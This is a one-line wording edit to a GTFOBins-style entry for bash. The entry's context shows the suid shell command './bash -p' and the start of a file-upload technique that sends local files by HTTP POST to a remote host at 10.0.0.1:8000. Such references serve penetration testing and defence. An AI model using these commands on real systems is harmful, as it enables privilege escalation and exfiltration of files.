diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md index da1b81d..2be954d 100644 --- a/_gtfobins/bash.md +++ b/_gtfobins/bash.md @@ -7,7 +7,7 @@ functions: suid-enabled: - code: ./bash -p upload: - - description: Send local file in the body of an HTTP POST request. Run an HTTP service to collect the file from the other end. + - description: Send local file in the body of an HTTP POST request. Run an HTTP service to collect the file on the other end. code: | RHOST=10.0.0.1 RPORT=8000